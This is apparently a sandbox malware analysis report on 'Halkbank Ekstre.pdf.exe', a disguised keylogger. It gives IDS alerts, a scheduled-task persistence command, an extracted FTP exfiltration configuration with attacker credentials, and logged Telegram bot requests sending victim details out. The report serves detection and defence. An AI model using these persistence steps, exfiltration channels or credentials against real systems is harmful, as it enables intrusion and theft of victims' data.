Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uAHDaCgpWpsogA" /XML "C:\Users\user\AppData\Local\Temp\tmp9D32.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uAHDaCgpWpsogA" /XML "C:\Users\user\AppData\Local\Temp\tmp9D32.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe", ParentImage: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe, ParentProcessId: 1956, ParentProcessName: Halkbank Ekstre.pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uAHDaCgpWpsogA" /XML "C:\Users\user\AppData\Local\Temp\tmp9D32.tmp", ProcessId: 1544, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-21T16:44:14.255377+0100	2803305	3	Unknown Traffic	192.168.2.9	49782	104.21.112.1	443	TCP
2025-01-21T16:44:17.408666+0100	2803305	3	Unknown Traffic	192.168.2.9	49802	104.21.112.1	443	TCP
2025-01-21T16:44:21.317757+0100	2803305	3	Unknown Traffic	192.168.2.9	49826	104.21.112.1	443	TCP
2025-01-21T16:44:22.549675+0100	2803305	3	Unknown Traffic	192.168.2.9	49837	104.21.112.1	443	TCP
2025-01-21T16:44:23.747814+0100	2803305	3	Unknown Traffic	192.168.2.9	49844	104.21.112.1	443	TCP
2025-01-21T16:44:23.886130+0100	2803305	3	Unknown Traffic	192.168.2.9	49849	104.21.112.1	443	TCP
2025-01-21T16:44:25.084406+0100	2803305	3	Unknown Traffic	192.168.2.9	49856	104.21.112.1	443	TCP
2025-01-21T16:44:27.547769+0100	2803305	3	Unknown Traffic	192.168.2.9	49872	104.21.112.1	443	TCP
2025-01-21T16:44:28.778531+0100	2803305	3	Unknown Traffic	192.168.2.9	49880	104.21.112.1	443	TCP
2025-01-21T16:44:29.979020+0100	2803305	3	Unknown Traffic	192.168.2.9	49889	104.21.112.1	443	TCP
2025-01-21T16:44:31.201643+0100	2803305	3	Unknown Traffic	192.168.2.9	49900	104.21.112.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-21T16:44:12.488269+0100	2803274	2	Potentially Bad Traffic	192.168.2.9	49772	158.101.44.242	80	TCP
2025-01-21T16:44:13.691109+0100	2803274	2	Potentially Bad Traffic	192.168.2.9	49772	158.101.44.242	80	TCP
2025-01-21T16:44:15.441125+0100	2803274	2	Potentially Bad Traffic	192.168.2.9	49787	158.101.44.242	80	TCP
2025-01-21T16:44:22.488007+0100	2803274	2	Potentially Bad Traffic	192.168.2.9	49832	158.101.44.242	80	TCP
2025-01-21T16:44:23.347357+0100	2803274	2	Potentially Bad Traffic	192.168.2.9	49832	158.101.44.242	80	TCP
2025-01-21T16:44:24.506127+0100	2803274	2	Potentially Bad Traffic	192.168.2.9	49851	158.101.44.242	80	TCP

ETPRO MALWARE Snake Keylogger Exfil via FTP M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-21T16:43:58.019232+0100	2845532	1	Malware Command and Control Activity Detected	192.168.2.9	49960	119.18.54.39	21	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-21T16:44:24.711681+0100	1810007	1	Potentially Bad Traffic	192.168.2.9	49850	149.154.167.220	443	TCP
2025-01-21T16:44:33.303746+0100	1810007	1	Potentially Bad Traffic	192.168.2.9	49915	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.unpack

Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "FTP", "Username": "anonymous_log@kashmirestore.com", "Password": "c%P+6,(]YFvP", "FTP Server": "ftp://kashmirestore.com/"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe

ReversingLabs: Detection: 36%

Multi AV Scanner detection for submitted file

Source: Halkbank Ekstre.pdf.exe	Virustotal: Detection: 38%			Perma Link
Source: Halkbank Ekstre.pdf.exe	ReversingLabs: Detection: 36%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Halkbank Ekstre.pdf.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: Halkbank Ekstre.pdf.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.9:49777 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.9:49839 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49850 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49915 version: TLS 1.2

Source: Halkbank Ekstre.pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: srmB.pdb source: Halkbank Ekstre.pdf.exe, uAHDaCgpWpsogA.exe.0.dr
Source:	Binary string: srmB.pdbSHA256 source: Halkbank Ekstre.pdf.exe, uAHDaCgpWpsogA.exe.0.dr

Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 4x nop then jmp 017BF45Dh	9_2_017BF2C0
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 4x nop then jmp 017BF45Dh	9_2_017BF52F
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 4x nop then jmp 017BF45Dh	9_2_017BF4AC
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 4x nop then jmp 017BFC19h	9_2_017BF961
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 4x nop then jmp 06FF31E0h	9_2_06FF2DC8
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 4x nop then jmp 06FF0D0Dh	9_2_06FF0B30
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 4x nop then jmp 06FF1697h	9_2_06FF0B30
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 4x nop then jmp 06FF2C19h	9_2_06FF2968
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 4x nop then jmp 06FFE959h	9_2_06FFE6B0
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	9_2_06FF0673
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 4x nop then jmp 06FFE0A9h	9_2_06FFDE00
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 4x nop then jmp 06FFF209h	9_2_06FFEF60
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 4x nop then jmp 06FFCF49h	9_2_06FFCCA0
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 4x nop then jmp 06FF31E0h	9_2_06FF2DC2
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 4x nop then jmp 06FFD7F9h	9_2_06FFD550
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 4x nop then jmp 06FFE501h	9_2_06FFE258
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 4x nop then jmp 06FFF661h	9_2_06FFF3B8
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 4x nop then jmp 06FFEDB1h	9_2_06FFEB08
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 4x nop then jmp 06FFD3A1h	9_2_06FFD0F8
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	9_2_06FF0853
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	9_2_06FF0040
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 4x nop then jmp 06FFFAB9h	9_2_06FFF810
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 4x nop then jmp 06FFDC51h	9_2_06FFD9A8
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 4x nop then jmp 06FF31E0h	9_2_06FF310E
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 4x nop then jmp 076AA4DEh	10_2_076A9B4A
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 4x nop then jmp 017DF45Dh	17_2_017DF2C0
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 4x nop then jmp 017DF45Dh	17_2_017DF52F
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 4x nop then jmp 017DF45Dh	17_2_017DF4AC
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 4x nop then jmp 017DFC19h	17_2_017DF961

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2845532 - Severity 1 - ETPRO MALWARE Snake Keylogger Exfil via FTP M1 : 192.168.2.9:49960 -> 119.18.54.39:21
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.9:49850 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.9:49915 -> 149.154.167.220:443

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 119.18.54.39 ports 39440,36695,1,2,35453,21

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.9:49939 -> 119.18.54.39:36695

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:855271%0D%0ADate%20and%20Time:%2021/01/2025%20/%2022:28:57%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20855271%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:855271%0D%0ADate%20and%20Time:%2021/01/2025%20/%2022:09:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20855271%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox View	IP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox View	IP Address: 119.18.54.39 119.18.54.39

Source: Joe Sandbox View

ASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49832 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49787 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49772 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49851 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49802 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49844 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49837 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49826 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49782 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49900 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49849 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49872 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49880 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49856 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49889 -> 104.21.112.1:443

Source: unknown

FTP traffic detected: 119.18.54.39:21 -> 192.168.2.9:49920 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 21:14. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 21:14. Server port: 21.220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 21:14. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.9:49777 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.9:49839 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:855271%0D%0ADate%20and%20Time:%2021/01/2025%20/%2022:28:57%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20855271%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:855271%0D%0ADate%20and%20Time:%2021/01/2025%20/%2022:09:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20855271%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

